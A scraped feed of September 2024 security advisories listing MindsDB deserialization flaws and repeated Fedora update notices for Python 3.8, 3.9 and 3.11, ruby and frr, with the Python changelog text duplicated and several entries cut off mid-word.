17.09.2024 17:03:50pypi[PYSEC-2024-82] mindsdb vulnerabilityDeserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded model to run arbitrary code on the server when interacted with.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-82
17.09.2024 17:03:50pypi[PYSEC-2024-83] mindsdb vulnerabilityDeserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when used for a prediction.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-83
17.09.2024 17:03:50pypi[PYSEC-2024-84] mindsdb vulnerabilityDeserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when a ‘describe’ query is run on it.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-84
17.09.2024 17:03:51pypi[PYSEC-2024-85] mindsdb vulnerabilityDeserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when using ‘finetune’ on it.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-85
20.09.2024 04:57:05fedora[FEDORA-2024-1e6d6f8452] Fedora 40: python3.9 (critical)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
This is a security release of Python 3.9
Note: The release you're looking at is Python 3.9.20, a security bugfix release for the legacy 3.9 series. Python 3.12 is now the latest feature release series of Python 3. Get the latest release of 3.12.x here.
Security content in this release
gh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fix CVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the new directory to the current user. This fixes CVE-2024-4030 affecting tempfile.mkdtemp() in scenarios where the base temporary directory is more permissive than the default.
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see [`ver
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1e6d6f8452
20.09.2024 04:57:05fedora[FEDORA-2024-6dedbc5cf9] Fedora 40: python3.8 (critical)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
This is a security release of Python 3.9
Note: The release you're looking at is Python 3.9.20, a security bugfix release for the legacy 3.9 series. Python 3.12 is now the latest feature release series of Python 3. Get the latest release of 3.12.x here.
Security content in this release
gh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fix CVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the new directory to the current user. This fixes CVE-2024-4030 affecting tempfile.mkdtemp() in scenarios where the base temporary directory is more permissive than the default.
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see [`ver
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6dedbc5cf9
20.09.2024 03:44:07fedora[FEDORA-2024-f652468298] Fedora 39: python3.8 (critical)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
This is a security release of Python 3.9
Note: The release you're looking at is Python 3.9.20, a security bugfix release for the legacy 3.9 series. Python 3.12 is now the latest feature release series of Python 3. Get the latest release of 3.12.x here.
Security content in this release
gh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fix CVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the new directory to the current user. This fixes CVE-2024-4030 affecting tempfile.mkdtemp() in scenarios where the base temporary directory is more permissive than the default.
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see [`ver
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f652468298
20.09.2024 03:44:06fedora[FEDORA-2024-7db9258d37] Fedora 39: python3.9 (critical)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
This is a security release of Python 3.9
Note: The release you're looking at is Python 3.9.20, a security bugfix release for the legacy 3.9 series. Python 3.12 is now the latest feature release series of Python 3. Get the latest release of 3.12.x here.
Security content in this release
gh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fix CVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the new directory to the current user. This fixes CVE-2024-4030 affecting tempfile.mkdtemp() in scenarios where the base temporary directory is more permissive than the default.
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see [`ver
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7db9258d37
20.09.2024 03:44:06fedora[FEDORA-2024-37d9c902dd] Fedora 39: python3.11 (high)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-37d9c902dd
20.09.2024 03:44:03fedora[FEDORA-2024-2fb325d068] Fedora 39: ruby (medium)Upgrade to Ruby 3.2.5.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2fb325d068
20.09.2024 03:44:01fedora[FEDORA-2024-2fff2b9a18] Fedora 39: frr (high)Fix for CVE-2024-44070https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2fff2b9a18
20.09.2024 03:16:29fedora[FEDORA-2024-7a069f48e4] Fedora 41: python3.8 (critical)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
This is a security release of Python 3.9
Note: The release you're looking at is Python 3.9.20, a security bugfix release for the legacy 3.9 series. Python 3.12 is now the latest feature release series of Python 3. Get the latest release of 3.12.x here.
Security content in this release
gh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fix CVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the new directory to the current user. This fixes CVE-2024-4030 affecting tempfile.mkdtemp() in scenarios where the base temporary directory is more permissive than the default.
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see [`ver
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7a069f48e4
20.09.2024 03:16:28fedora[FEDORA-2024-308628ebb8] Fedora 41: python3.9 (critical)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
This is a security release of Python 3.9
Note: The release you're looking at is Python 3.9.20, a security bugfix release for the legacy 3.9 series. Python 3.12 is now the latest feature release series of Python 3. Get the latest release of 3.12.x here.
Security content in this release
gh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fix CVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the new directory to the current user. This fixes CVE-2024-4030 affecting tempfile.mkdtemp() in scenarios where the base temporary directory is more permissive than the default.
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see [`ver
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-308628ebb8
20.09.2024 03:16:28fedora[FEDORA-2024-ae2925c3ae] Fedora 41: python3.11 (high)
This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
